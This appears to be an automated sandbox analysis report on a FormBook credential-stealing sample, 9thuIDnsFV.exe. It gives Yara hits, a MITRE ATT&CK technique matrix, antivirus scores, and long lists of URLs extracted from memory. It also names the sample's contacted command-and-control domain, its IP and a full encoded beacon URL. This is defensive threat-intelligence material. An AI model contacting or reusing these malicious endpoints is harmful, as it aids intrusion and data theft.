Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection712	Rootkit1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection712	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing2	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9thuIDnsFV.exe	39%	Virustotal		Browse
9thuIDnsFV.exe	24%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	24%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
10.2.9thuIDnsFV.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.carterandcone.comces	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.carterandcone.comes	0%	URL Reputation	safe
http://www.carterandcone.comes	0%	URL Reputation	safe
http://www.carterandcone.comes	0%	URL Reputation	safe
http://www.zhongyicts.com.cnr-fC	0%	Avira URL Cloud	safe
http://www.carterandcone.comams	0%	Avira URL Cloud	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.sandoll.co.krs-czom	0%	Avira URL Cloud	safe
http://www.tiro.com-jpL	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.sandoll.co.krFc	0%	Avira URL Cloud	safe
http://www.carterandcone.comroa	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.sajatypeworks.comG	0%	Avira URL Cloud	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cnht	0%	URL Reputation	safe
http://www.founder.com.cn/cnht	0%	URL Reputation	safe
http://www.founder.com.cn/cnht	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.zhongyicts.com.cncr	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.sajatypeworks.comM	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
www.containerflippers.com/np0c/	0%	Avira URL Cloud	safe
http://www.urwpp.de0	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.carterandcone.comic	0%	URL Reputation	safe
http://www.carterandcone.comic	0%	URL Reputation	safe
http://www.carterandcone.comic	0%	URL Reputation	safe
http://www.goodfont.co.k)	0%	Avira URL Cloud	safe
http://www.carterandcone.comexc	0%	URL Reputation	safe
http://www.carterandcone.comexc	0%	URL Reputation	safe
http://www.carterandcone.comexc	0%	URL Reputation	safe
http://www.founder.com.cn/cnMic	0%	Avira URL Cloud	safe
http://www.carterandcone.come	0%	URL Reputation	safe
http://www.carterandcone.come	0%	URL Reputation	safe
http://www.carterandcone.come	0%	URL Reputation	safe
http://www.carterandcone.comc	0%	URL Reputation	safe
http://www.carterandcone.comc	0%	URL Reputation	safe
http://www.carterandcone.comc	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comcr	0%	Avira URL Cloud	safe
http://www.opera.com0	0%	Avira URL Cloud	safe
http://www.carterandcone.comlt	0%	URL Reputation	safe
http://www.carterandcone.comlt	0%	URL Reputation	safe
http://www.carterandcone.comlt	0%	URL Reputation	safe
http://www.carterandcone.comaF	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnld	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.driplockerstore.com	5.79.68.101	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.containerflippers.com/np0c/	true	Avira URL Cloud: safe	low
http://www.driplockerstore.com/np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.carterandcone.comces	9thuIDnsFV.exe, 00000001.00000003.334310160.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comes	9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cnr-fC	9thuIDnsFV.exe, 00000001.00000003.333587115.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comams	9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comal	9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.krs-czom	9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com-jpL	9thuIDnsFV.exe, 00000001.00000003.333190214.0000000006173000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.krFc	9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comroa	9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.comG	9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com.	9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnht	9thuIDnsFV.exe, 00000001.00000003.332056051.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cncr	9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.comM	9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	9thuIDnsFV.exe, 00000001.00000003.329336409.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designersa	9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmp	false		high
http://www.urwpp.de0	9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.336179079.0000000006173000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designersers5	9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.de	9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.341292306.0000000006177000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.como.	9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designersp	9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comic	9thuIDnsFV.exe, 00000001.00000003.334215573.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.k)	9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comexc	9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnMic	9thuIDnsFV.exe, 00000001.00000003.332290487.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.come	9thuIDnsFV.exe, 00000001.00000003.334264597.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comc	9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comTC	9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comcr	9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opera.com0	9thuIDnsFV.exe	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comlt	9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comaF	9thuIDnsFV.exe, 00000001.00000003.333788508.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnld	9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmm	9thuIDnsFV.exe, 00000001.00000003.342672431.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de?	9thuIDnsFV.exe, 00000001.00000003.341330812.0000000006178000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://en.w	9thuIDnsFV.exe, 00000001.00000003.330013890.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.krtp	9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	9thuIDnsFV.exe, 00000001.00000003.339998468.000000000618E000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.339943360.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	9thuIDnsFV.exe, 00000001.00000003.340799548.000000000618E000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn6	9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers$	9thuIDnsFV.exe, 00000001.00000003.339414645.000000000616B000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
